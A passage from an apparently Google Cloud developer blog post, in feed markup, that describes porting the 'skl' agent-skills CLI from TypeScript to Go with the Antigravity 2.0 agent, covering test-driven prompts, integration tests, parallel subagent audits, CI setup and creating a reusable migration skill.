    &lt;dd&gt;&amp;lt;ListValue: [StructValue([(&amp;#x27;code&amp;#x27;, &amp;#x27;&amp;quot;zed&amp;quot;: {\r\n\tName:        &amp;quot;zed&amp;quot;,\r\n\tDisplayName: &amp;quot;Zed&amp;quot;,\r\n\tSkillsDir:   &amp;quot;.agents/skills&amp;quot;,\r\n\tGlobalSkillsDir: filepath.Join(home, &amp;quot;.agents/skills&amp;quot;),\r\n\tDetectInstalled: func(h, c, w string) bool {\r\n\t\treturn exists(filepath.Join(c, &amp;quot;zed&amp;quot;)) ||\r\n\t\t\t(zedAppDataHome != &amp;quot;&amp;quot; &amp;amp;&amp;amp; exists(filepath.Join(zedAppDataHome, &amp;quot;Zed&amp;quot;))) ||\r\n\t\t\t(zedFlatpakConfigHome != &amp;quot;&amp;quot; &amp;amp;&amp;amp; exists(filepath.Join(zedFlatpakConfigHome, &amp;quot;zed&amp;quot;)))\r\n\t},\r\n}&amp;#x27;), (&amp;#x27;language&amp;#x27;, &amp;#x27;&amp;#x27;), (&amp;#x27;caption&amp;#x27;, &amp;lt;wagtail.rich_text.RichText object at 0x7f0be76baa00&amp;gt;)])]&amp;gt;&lt;/dd&gt;
&lt;/dl&gt;&lt;/div&gt;
&lt;div class="block-paragraph_advanced"&gt;&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Next, I noticed that the Antigravity user onboarding code was intermingled with the automated mapping. A default like this one is a personal user choice and is better suited for isolation in its own file: &lt;/span&gt;&lt;a href="https://github.com/alexastrum/skl/blob/main/src/skl/agy-onboarding.go" rel="noopener" target="_blank"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;agy-onboarding.go&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt;:&lt;/span&gt;&lt;/p&gt;&lt;/div&gt;
&lt;div class="block-code"&gt;&lt;dl&gt;
    &lt;dt&gt;code_block&lt;/dt&gt;
    &lt;dd&gt;&amp;lt;ListValue: [StructValue([(&amp;#x27;code&amp;#x27;, &amp;#x27;move default Antigravity 2 prompting to agy-onboarding.go&amp;#x27;), (&amp;#x27;language&amp;#x27;, &amp;#x27;&amp;#x27;), (&amp;#x27;caption&amp;#x27;, &amp;lt;wagtail.rich_text.RichText object at 0x7f0be76bad00&amp;gt;)])]&amp;gt;&lt;/dd&gt;
&lt;/dl&gt;&lt;/div&gt;
&lt;div class="block-paragraph_advanced"&gt;&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;With version zero scaffolded, it was time to test.&lt;/span&gt;&lt;/p&gt;
&lt;h2&gt;&lt;span style="vertical-align: baseline;"&gt;Step 3: Enforcing a quality assurance (QA) loop&lt;/span&gt;&lt;/h2&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;To guarantee that the Go port behaved identically to the original TypeScript CLI, we adopted a Test-Driven Development (TDD) loop. I kicked it off with this prompt:&lt;/span&gt;&lt;/p&gt;&lt;/div&gt;
&lt;div class="block-code"&gt;&lt;dl&gt;
    &lt;dt&gt;code_block&lt;/dt&gt;
    &lt;dd&gt;&amp;lt;ListValue: [StructValue([(&amp;#x27;code&amp;#x27;, &amp;#x27;Apply TDD principles and https://preslav.me/2026/05/19/10-golang-error-handling-commandments/&amp;#x27;), (&amp;#x27;language&amp;#x27;, &amp;#x27;&amp;#x27;), (&amp;#x27;caption&amp;#x27;, &amp;lt;wagtail.rich_text.RichText object at 0x7f0be56b9730&amp;gt;)])]&amp;gt;&lt;/dd&gt;
&lt;/dl&gt;&lt;/div&gt;
&lt;div class="block-paragraph_advanced"&gt;&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;This initiated the TDD process. Rather than explicitly prompting the agent to use skills, I guided it to fetch the 3rd party best-practice blog post, which reminded the agent about relevant Agent Skills (&lt;/span&gt;&lt;a href="https://github.com/alexastrum/skl/blob/main/.agents/skills/golang-how-to/SKILL.md" rel="noopener" target="_blank"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;golang-how-to&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt;, &lt;/span&gt;&lt;a href="https://github.com/alexastrum/skl/blob/main/.agents/skills/golang-testing/SKILL.md" rel="noopener" target="_blank"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;golang-testing&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt;, &lt;/span&gt;&lt;a href="https://github.com/alexastrum/skl/blob/main/.agents/skills/golang-error-handling/SKILL.md" rel="noopener" target="_blank"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;golang-error-handling&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt;, and &lt;/span&gt;&lt;a href="https://github.com/alexastrum/skl/blob/main/.agents/skills/golang-cli/SKILL.md" rel="noopener" target="_blank"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;golang-cli&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt;). Because Antigravity has a sandbox, it parsed these skills and automatically started executing the QA loop. And it will keep re-applying these TDD principles in the current trajectory, anytime it is about to change functional code.&lt;/span&gt;&lt;/p&gt;
&lt;h3&gt;&lt;span style="vertical-align: baseline;"&gt;Test-first frontmatter parsing&lt;/span&gt;&lt;/h3&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;For frontmatter parsing, the agent wrote &lt;/span&gt;&lt;a href="https://github.com/alexastrum/skl/blob/main/src/skl/frontmatter_test.go" rel="noopener" target="_blank"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;frontmatter_test.go&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt; first using Go's table-driven test pattern (which was a delightful new pattern for me to discover):&lt;/span&gt;&lt;/p&gt;&lt;/div&gt;
&lt;div class="block-code"&gt;&lt;dl&gt;
    &lt;dt&gt;code_block&lt;/dt&gt;
    &lt;dd&gt;&amp;lt;ListValue: [StructValue([(&amp;#x27;code&amp;#x27;, &amp;#x27;func TestParseFrontmatter(t *testing.T) {\r\n\ttests := []struct {\r\n\t\tname        string\r\n\t\traw         string\r\n\t\twantData    map[string]interface{}\r\n\t\twantContent string\r\n\t}{\r\n\t\t{\r\n\t\t\tname:        &amp;quot;valid frontmatter&amp;quot;,\r\n\t\t\traw:         &amp;quot;---\\nname: my-skill\\n---\\n# Content\\n&amp;quot;,\r\n\t\t\twantData:    map[string]interface{}{&amp;quot;name&amp;quot;: &amp;quot;my-skill&amp;quot;},\r\n\t\t\twantContent: &amp;quot;# Content\\n&amp;quot;,\r\n\t\t},\r\n\t}\r\n\tfor _, tt := range tests {\r\n\t\tt.Run(tt.name, func(t *testing.T) {\r\n\t\t\tgotData, gotContent, err := ParseFrontmatter(tt.raw)\r\n\t\t\t# assert results...\r\n\t\t})\r\n\t}\r\n}&amp;#x27;), (&amp;#x27;language&amp;#x27;, &amp;#x27;&amp;#x27;), (&amp;#x27;caption&amp;#x27;, &amp;lt;wagtail.rich_text.RichText object at 0x7f0be56b9fd0&amp;gt;)])]&amp;gt;&lt;/dd&gt;
&lt;/dl&gt;&lt;/div&gt;
&lt;div class="block-paragraph_advanced"&gt;&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;When Antigravity ran &lt;/span&gt;&lt;code style="vertical-align: baseline;"&gt;go test&lt;/code&gt;&lt;span style="vertical-align: baseline;"&gt;, it failed cleanly as we expected. My agent then generated &lt;/span&gt;&lt;a href="https://github.com/alexastrum/skl/blob/main/src/skl/frontmatter.go" rel="noopener" target="_blank"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;frontmatter.go&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt;, implementing a linear string scanning loop that splits the document and unmarshals its YAML metadata. By using simple linear scanning instead of complex regular expressions, we hardened our tool against Regular Expression Denial of Service (ReDoS) vulnerabilities that could crash the application. Including &lt;/span&gt;&lt;code style="vertical-align: baseline;"&gt;safety&lt;/code&gt;&lt;span style="vertical-align: baseline;"&gt; as a goal (in my initial prompt) resulted in safer code, even though the original Node implementation was using regular expressions.&lt;/span&gt;&lt;/p&gt;
&lt;h3&gt;&lt;span style="vertical-align: baseline;"&gt;Grounding via error commandments&lt;/span&gt;&lt;/h3&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Since we're talking about error handling, I'll cover here how we aligned our error structures with Preslav Rachev's &lt;/span&gt;&lt;a href="https://preslav.me/2026/05/19/10-golang-error-handling-commandments/" rel="noopener" target="_blank"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;10 Golang Error Handling Commandments&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt;. Go requires you to return error values explicitly rather than catching them as exceptions. By integrating these rules, I directed the agent to check its errors immediately at every level (&lt;/span&gt;&lt;code style="vertical-align: baseline;"&gt;if err != nil&lt;/code&gt;&lt;span style="vertical-align: baseline;"&gt;) and wrap them with contextual detail (&lt;/span&gt;&lt;code style="vertical-align: baseline;"&gt;fmt.Errorf("action: %w", err)&lt;/code&gt;&lt;span style="vertical-align: baseline;"&gt;) before it propagates them up our call stack. While doing a final review of the generated code, I realized Antigravity forgot about this best practice, so I reminded it:&lt;/span&gt;&lt;/p&gt;&lt;/div&gt;
&lt;div class="block-code"&gt;&lt;dl&gt;
    &lt;dt&gt;code_block&lt;/dt&gt;
    &lt;dd&gt;&amp;lt;ListValue: [StructValue([(&amp;#x27;code&amp;#x27;, &amp;quot;shorten error messages in all files, remove &amp;#x27;failed to&amp;#x27; prefixes, etc. See the 10 golang commandments&amp;quot;), (&amp;#x27;language&amp;#x27;, &amp;#x27;&amp;#x27;), (&amp;#x27;caption&amp;#x27;, &amp;lt;wagtail.rich_text.RichText object at 0x7f0be56b9a00&amp;gt;)])]&amp;gt;&lt;/dd&gt;
&lt;/dl&gt;&lt;/div&gt;
&lt;div class="block-paragraph_advanced"&gt;&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;It promptly &lt;/span&gt;&lt;a href="https://github.com/alexastrum/skl/commit/59822bc69464a5fce961231ef56ac0e775855aeb" rel="noopener" target="_blank"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;fixed&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt; them across the codebase.&lt;/span&gt;&lt;/p&gt;
&lt;h3&gt;&lt;span style="vertical-align: baseline;"&gt;Are unit tests enough?&lt;/span&gt;&lt;/h3&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;The short answer is &lt;/span&gt;&lt;strong style="vertical-align: baseline;"&gt;No&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt;. &lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;To ensure that the AI did not introduce subtle bugs or hallucinations during the translation process, I performed code reviews rather than blindly trusting passing test suites.&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;When I audited the generated tests, I realized that passing green checks alone weren't enough: We were missing tests for that long list of installation locations and the various combinations of having no agents, a single agent, or multiple agents active at the same time. Since this was a complete rewrite, I wanted end-to-end integration coverage for these journeys. To address this gap, I prompted Antigravity with a set of targeted scenarios:&lt;/span&gt;&lt;/p&gt;&lt;/div&gt;
&lt;div class="block-code"&gt;&lt;dl&gt;
    &lt;dt&gt;code_block&lt;/dt&gt;
    &lt;dd&gt;&amp;lt;ListValue: [StructValue([(&amp;#x27;code&amp;#x27;, &amp;#x27;Add integration tests:\r\n1. no agents installed: verify that it installs to antigravity and outputs the agy-cli onboarding tip.\r\n2. support for all agents but one\r\n3. exactly one agent installed, including cases where the same path might be attributed to multiple agents\r\n4. support for non-parametrized agents&amp;#x27;), (&amp;#x27;language&amp;#x27;, &amp;#x27;&amp;#x27;), (&amp;#x27;caption&amp;#x27;, &amp;lt;wagtail.rich_text.RichText object at 0x7f0be56b91c0&amp;gt;)])]&amp;gt;&lt;/dd&gt;
&lt;/dl&gt;&lt;/div&gt;
&lt;div class="block-paragraph_advanced"&gt;&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;strong&gt;Note&lt;/strong&gt;: Non-parameterized agents like Claude Code or Codex define their configuration paths globally when the package loads (or via environment variables) instead of scanning the active workspace folder at runtime.&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;The &lt;/span&gt;&lt;a href="https://github.com/alexastrum/skl/commit/02f170e" rel="noopener" target="_blank"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;changelist&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt; that added these tests didn't touch any production files, the logic was solid. But I didn't want to leave this to luck. If you care about a specific feature or workflow, you have to be explicit about it. Taking five minutes to verify your end-to-end coverage and defining a few solid tests protects your users from experiencing a broken release down the line.&lt;/span&gt;&lt;/p&gt;
&lt;h2&gt;&lt;span style="vertical-align: baseline;"&gt;Step 4: Parallel subagents for CLI commands&lt;/span&gt;&lt;/h2&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;When you port a full suite of CLI commands (&lt;/span&gt;&lt;code style="vertical-align: baseline;"&gt;init&lt;/code&gt;&lt;span style="vertical-align: baseline;"&gt;, &lt;/span&gt;&lt;code style="vertical-align: baseline;"&gt;add&lt;/code&gt;&lt;span style="vertical-align: baseline;"&gt;, &lt;/span&gt;&lt;code style="vertical-align: baseline;"&gt;list&lt;/code&gt;&lt;span style="vertical-align: baseline;"&gt;, &lt;/span&gt;&lt;code style="vertical-align: baseline;"&gt;remove&lt;/code&gt;&lt;span style="vertical-align: baseline;"&gt;, &lt;/span&gt;&lt;code style="vertical-align: baseline;"&gt;find&lt;/code&gt;&lt;span style="vertical-align: baseline;"&gt;, &lt;/span&gt;&lt;code style="vertical-align: baseline;"&gt;update,...&lt;/code&gt;&lt;span style="vertical-align: baseline;"&gt;) along with their sub-options, you face a large surface area. Rather than migrating them sequentially, it might be better to parallelize our work. In our case, it was a good choice because we wanted each subagent to focus on its specific topic rather than keep in mind the entire tool, and this helped spot a few gaps.&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;However, subagents are not always the best choice; you should only prioritize parallel execution on voluminous, independent tasks that are clearly bounded. When done right, parallel subagents won't consume significantly more tokens than a single long-running thread, but they protect the main coordinator agent from hitting context compression limits under the weight of a massive codebase. Most simple projects do not require this level of scale. A good rule of thumb is to reserve subagents for workloads equivalent to tens of features with tens of subfeatures.&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;In previous steps, I ran a single agent to quickly and efficiently build an MVP. But I was not sure whether it fully ported the code. So I asked it directly:&lt;/span&gt;&lt;/p&gt;&lt;/div&gt;
&lt;div class="block-code"&gt;&lt;dl&gt;
    &lt;dt&gt;code_block&lt;/dt&gt;
    &lt;dd&gt;&amp;lt;ListValue: [StructValue([(&amp;#x27;code&amp;#x27;, &amp;#x27;did you cover 100% of the original CLI? \r\nhave subagents research each option individually and each test and fill in the gaps&amp;#x27;), (&amp;#x27;language&amp;#x27;, &amp;#x27;&amp;#x27;), (&amp;#x27;caption&amp;#x27;, &amp;lt;wagtail.rich_text.RichText object at 0x7f0be56b9070&amp;gt;)])]&amp;gt;&lt;/dd&gt;
&lt;/dl&gt;&lt;/div&gt;
&lt;div class="block-paragraph_advanced"&gt;&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;It turned out this was the right call. The subagents conducted an in-depth audit of the commands, catching several option gaps and missing tests that were subsequently integrated in this &lt;/span&gt;&lt;a href="https://github.com/alexastrum/skl/commit/b9467b6783bbbadbb4236bbde5f49aab7224bd78" rel="noopener" target="_blank"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;audit commit&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt;.&lt;/span&gt;&lt;/p&gt;&lt;/div&gt;
&lt;div class="block-code"&gt;&lt;dl&gt;
    &lt;dt&gt;code_block&lt;/dt&gt;
    &lt;dd&gt;&amp;lt;ListValue: []&amp;gt;&lt;/dd&gt;
&lt;/dl&gt;&lt;/div&gt;
&lt;div class="block-image_full_width"&gt;






  
    &lt;div class="article-module h-c-page"&gt;
      &lt;div class="h-c-grid"&gt;
  

    &lt;figure class="article-image--large
      
      
        h-c-grid__col
        h-c-grid__col--6 h-c-grid__col--offset-3
        
        
      "&gt;

      
      
        
        &lt;img alt="mermaid_chart" src="https://storage.googleapis.com/gweb-cloudblog-publish/images/mermaid_chart.max-1000x1000.jpg" /&gt;
        
        &lt;/a&gt;
      
    &lt;/figure&gt;

  
      &lt;/div&gt;
    &lt;/div&gt;
  




&lt;/div&gt;
&lt;div class="block-paragraph_advanced"&gt;&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Each subagent worked on exactly one command. They analyzed flag permutations like &lt;/span&gt;&lt;code style="vertical-align: baseline;"&gt;-g/--global&lt;/code&gt;&lt;span style="vertical-align: baseline;"&gt; and &lt;/span&gt;&lt;code style="vertical-align: baseline;"&gt;--copy&lt;/code&gt;&lt;span style="vertical-align: baseline;"&gt;, drafted table-driven unit tests, and verified their code compiled cleanly. Once they reported back, the main coordinator integrated their changes, resolved any conflicts, and validated that the entire combined project compiled successfully.&lt;/span&gt;&lt;/p&gt;
&lt;h3&gt;&lt;span style="vertical-align: baseline;"&gt;The Elephant and the Goldfish&lt;/span&gt;&lt;/h3&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;To keep our agent focused during this migration, we used the Elephant and Goldfish metaphor, an architectural pattern documented in Google Research's &lt;/span&gt;&lt;a href="https://research.google/pubs/elephants-goldfish-and-the-new-golden-age-of-software-engineering" rel="noopener" target="_blank"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;Elephants, Goldfish, and the New Golden Age of Software Engineering&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt;. This relies on two distinct roles: the Elephant (the long-term coordinator session holding design rules and codebase memory) and the Goldfish (transient, clean subagents that you spawn to run a single task without background history).&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;While Antigravity does use automated session compression to manage its context size, you might want to actively manage your context window by maintaining your own checklists and partitioning your work to isolated, transient subagents, when &lt;/span&gt;&lt;span style="font-style: italic; vertical-align: baseline;"&gt;less (context) is more (clarity)&lt;/span&gt;&lt;span style="vertical-align: baseline;"&gt;.&lt;/span&gt;&lt;/p&gt;
&lt;h2&gt;&lt;span style="vertical-align: baseline;"&gt;Step 5: Package structure, compilation, and CI/CD&lt;/span&gt;&lt;/h2&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Through some back-and-forth communication, I learned how Go packages are structured and identified the limitations I needed to consider. I now had a cleanly structured and well documented package &lt;/span&gt;&lt;a href="https://github.com/alexastrum/skl/blob/main/main.go" rel="noopener" target="_blank"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;main.go&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt; that supported native installation:&lt;/span&gt;&lt;/p&gt;&lt;/div&gt;
&lt;div class="block-code"&gt;&lt;dl&gt;
    &lt;dt&gt;code_block&lt;/dt&gt;
    &lt;dd&gt;&amp;lt;ListValue: [StructValue([(&amp;#x27;code&amp;#x27;, &amp;#x27;go install github.com/alexastrum/skl@latest&amp;#x27;), (&amp;#x27;language&amp;#x27;, &amp;#x27;&amp;#x27;), (&amp;#x27;caption&amp;#x27;, &amp;lt;wagtail.rich_text.RichText object at 0x7f0be56b9310&amp;gt;)])]&amp;gt;&lt;/dd&gt;
&lt;/dl&gt;&lt;/div&gt;
&lt;div class="block-paragraph_advanced"&gt;&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;I prompted the agent to capture the implementation details and document them for future reference:&lt;/span&gt;&lt;/p&gt;&lt;/div&gt;
&lt;div class="block-code"&gt;&lt;dl&gt;
    &lt;dt&gt;code_block&lt;/dt&gt;
    &lt;dd&gt;&amp;lt;ListValue: [StructValue([(&amp;#x27;code&amp;#x27;, &amp;#x27;summarize findings for humans in README.md, considerations for agents in AGENTS.md&amp;#x27;), (&amp;#x27;language&amp;#x27;, &amp;#x27;&amp;#x27;), (&amp;#x27;caption&amp;#x27;, &amp;lt;wagtail.rich_text.RichText object at 0x7f0be56b9670&amp;gt;)])]&amp;gt;&lt;/dd&gt;
&lt;/dl&gt;&lt;/div&gt;
&lt;div class="block-paragraph_advanced"&gt;&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;To verify the build, auto-run tests, and make sure it works on other machines as well, I asked the agent to:&lt;/span&gt;&lt;/p&gt;&lt;/div&gt;
&lt;div class="block-code"&gt;&lt;dl&gt;
    &lt;dt&gt;code_block&lt;/dt&gt;
    &lt;dd&gt;&amp;lt;ListValue: [StructValue([(&amp;#x27;code&amp;#x27;, &amp;#x27;make sure it builds on all supported platforms&amp;#x27;), (&amp;#x27;language&amp;#x27;, &amp;#x27;&amp;#x27;), (&amp;#x27;caption&amp;#x27;, &amp;lt;wagtail.rich_text.RichText object at 0x7f0be56b9e20&amp;gt;)])]&amp;gt;&lt;/dd&gt;
&lt;/dl&gt;&lt;/div&gt;
&lt;div class="block-paragraph_advanced"&gt;&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Antigravity set up the &lt;/span&gt;&lt;a href="https://github.com/alexastrum/skl/blob/main/.github/workflows/ci.yml" rel="noopener" target="_blank"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;ci.yml&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt; workflow to run a matrix build, which had a surprising dependency:&lt;/span&gt;&lt;/p&gt;&lt;/div&gt;
&lt;div class="block-code"&gt;&lt;dl&gt;
    &lt;dt&gt;code_block&lt;/dt&gt;
    &lt;dd&gt;&amp;lt;ListValue: [StructValue([(&amp;#x27;code&amp;#x27;, &amp;#x27;env:\r\n  FORCE_JAVASCRIPT_ACTIONS_TO_NODE24: &amp;quot;true&amp;quot; # HMMMMMM ???\r\njobs:\r\n  test:\r\n    strategy:\r\n      matrix:\r\n        os: [ubuntu-latest, macos-latest, windows-latest]\r\n# ...&amp;#x27;), (&amp;#x27;language&amp;#x27;, &amp;#x27;&amp;#x27;), (&amp;#x27;caption&amp;#x27;, &amp;lt;wagtail.rich_text.RichText object at 0x7f0be56b9430&amp;gt;)])]&amp;gt;&lt;/dd&gt;
&lt;/dl&gt;&lt;/div&gt;
&lt;div class="block-paragraph_advanced"&gt;&lt;h3&gt;&lt;span style="vertical-align: baseline;"&gt;Unexpected caveats&lt;/span&gt;&lt;/h3&gt;
&lt;ol&gt;
&lt;li style="vertical-align: baseline;"&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Paradoxically, even though we migrated from Node to Go, our &lt;/span&gt;&lt;span style="vertical-align: baseline;"&gt;GitHub pipeline still depends&lt;/span&gt;&lt;span style="vertical-align: baseline;"&gt; on Node for standard GitHub Actions helpers like &lt;/span&gt;&lt;code style="vertical-align: baseline;"&gt;actions/checkout&lt;/code&gt;&lt;span style="vertical-align: baseline;"&gt; and &lt;/span&gt;&lt;code style="vertical-align: baseline;"&gt;actions/setup-go&lt;/code&gt;&lt;span style="vertical-align: baseline;"&gt;.&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;li style="vertical-align: baseline;"&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;The tool is completely ready to be run and compiled locally. However, if we want to distribute pre-compiled binaries to other users, we would need to configure code signing for macOS and Windows.&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;/ol&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Since building a custom action with code signing is a complex process, it is best reserved for another time.&lt;/span&gt;&lt;/p&gt;
&lt;h2&gt;&lt;span style="vertical-align: baseline;"&gt;Step 6: Create an Agent Skill&lt;/span&gt;&lt;/h2&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;It was time to document the process itself. To codify this workflow, we &lt;a href="https://github.com/alexastrum/skl/blob/main/.agents/skills/cli-to-go-migration/SKILL.md" rel="noopener" target="_blank"&gt;created a reusable Agent Skill&lt;/a&gt;&lt;/span&gt;&lt;span style="vertical-align: baseline;"&gt;.&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;I started by asking the agent to plan a skill creation prompt that included the most important steps:&lt;/span&gt;&lt;/p&gt;&lt;/div&gt;
&lt;div class="block-code"&gt;&lt;dl&gt;
    &lt;dt&gt;code_block&lt;/dt&gt;
    &lt;dd&gt;&amp;lt;ListValue: [StructValue([(&amp;#x27;code&amp;#x27;, &amp;#x27;Review the current trajectory (including my specific prompts that generated accepted results) and lets plan to create a `/cli-to-go-migration` skill. What steps should the skill follow?&amp;#x27;), (&amp;#x27;language&amp;#x27;, &amp;#x27;&amp;#x27;), (&amp;#x27;caption&amp;#x27;, &amp;lt;wagtail.rich_text.RichText object at 0x7f0be56b9280&amp;gt;)])]&amp;gt;&lt;/dd&gt;
&lt;/dl&gt;&lt;/div&gt;
&lt;div class="block-paragraph_advanced"&gt;&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;I got a draft prompt which I iterated upon. After some back-and-forth, I anchored my final instructions on five core rules (though yours might be different). Here's the final prompt I used:&lt;/span&gt;&lt;/p&gt;&lt;/div&gt;
&lt;div class="block-code"&gt;&lt;dl&gt;
    &lt;dt&gt;code_block&lt;/dt&gt;
    &lt;dd&gt;&amp;lt;ListValue: [StructValue([(&amp;#x27;code&amp;#x27;, &amp;#x27;Review the current trajectory (including my specific prompts that generated accepted results) and lets plan to create a `/cli-to-go-migration` skill. Rules:\r\n\r\n#### 1. Goals\r\nThe agent must start with research before proposing code. It identifies broader user goals, reviews multiple stack alternatives, and checks for prior work to lock in on one target language and research its idioms.\r\n\r\n#### 2. Setup\r\nBefore modifying any files, the agent verifies or initializes a Git repository to keep a clean history. Later, it must also report download failures directly and fail gracefully once all independent work is finished, rather than falling back to placeholders or non-terminating loops.\r\n\r\n#### 3. Importing existing knowledge\r\nIf required grounding skills (like `golang-cli` or `golang-testing`) are missing but are explicitly named in a prompt, the agent blocks execution and offers to install them automatically after asking for confirmation, rather than printing instructions for the developer to follow.\r\n\r\n#### 4. Breakpoints\r\nThe skill establishes hard halts for known AI pain points. The agent stops for human or algorithmic validation when encountering specific problems and anytime confusion sets in.\r\n\r\n#### 5. Alignment checks\r\nWhenever we see signs of misalignment, we need to set explicit rules. For example, when I noticed that the agent was over-editing some docs and missing others, I set the rule that the agent should only apply the `/humanizer` skill to human-facing files, like the `README.md` or help docs, while leaving structured developer context, like `AGENTS.md`, clean of style edits so that other agents can parse its metadata accurately.&amp;#x27;), (&amp;#x27;language&amp;#x27;, &amp;#x27;&amp;#x27;), (&amp;#x27;caption&amp;#x27;, &amp;lt;wagtail.rich_text.RichText object at 0x7f0be56b9fa0&amp;gt;)])]&amp;gt;&lt;/dd&gt;
&lt;/dl&gt;&lt;/div&gt;
&lt;div class="block-paragraph_advanced"&gt;&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;There isn't a one-size-fits-all approach, but asking the agent to create a skill and anchor it on a few guardrails is a good start. In practice, you will likely take turns polishing multiple prompts, until you feel like the agent's responses are aligned with your goals. Then you will ask for a proof read from the AI, and finally perform a human review of the &lt;/span&gt;&lt;code style="vertical-align: baseline;"&gt;SKILL.md&lt;/code&gt;&lt;span style="vertical-align: baseline;"&gt; contents.&lt;/span&gt;&lt;/p&gt;
&lt;h2&gt;&lt;span style="vertical-align: baseline;"&gt;Conclusion&lt;/span&gt;&lt;/h2&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Rebuilding &lt;/span&gt;&lt;code style="vertical-align: baseline;"&gt;skl&lt;/code&gt;&lt;span style="vertical-align: baseline;"&gt; in Go was a fun, educational experience that solved a personal tooling need. It worked, so I decided to document the process. Thinking through this prism, I realized that &lt;/span&gt;&lt;span style="font-style: italic; vertical-align: baseline;"&gt;the journey itself was the reward&lt;/span&gt;&lt;span style="vertical-align: baseline;"&gt;. You grow as an engineer by codifying your architectural choices into reusable skills and personal experience; while the compiled binary is the physical proof that your process worked.&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Surprisingly, the most significant shift I experienced during this migration is behavioral.&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Pulling away from an IDE (integrated development environment) and using Antigravity 2.0 made it easier for me to keep a high-level view, preventing me from going in and fixing the issues that arose during the migration. Instead, it guided me to understand why the issues occurred, and learn Go-language specific details.&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;In a traditional IDE, the moment your assistant encounters an issue, your instinct is to grab your keyboard and debug. Operating without an editor forces you to remain the architect, steering the machine from the navigation deck rather than fighting the engine room fires yourself. That's exactly how we learn to manage agents at scale.&lt;/span&gt;&lt;/p&gt;&lt;/div&gt;</content>
    <link href="https://cloud.google.com/blog/topics/developers-practitioners/how-i-learned-go-in-a-day-with-antigravity-20-and-how-you-can-do-the-same/" rel="alternate"/>
    <category term="Google Cloud"/>
    <published>2026-06-15T09:29:00+00:00</published>
  </entry>
  <entry>
    <id>https://developers.google.com/workspace/release-notes#June_15_2026</id>
    <title>Workspace Release Notes — June 15, 2026</title>
    <updated>2026-06-15T07:00:00+00:00</updated>
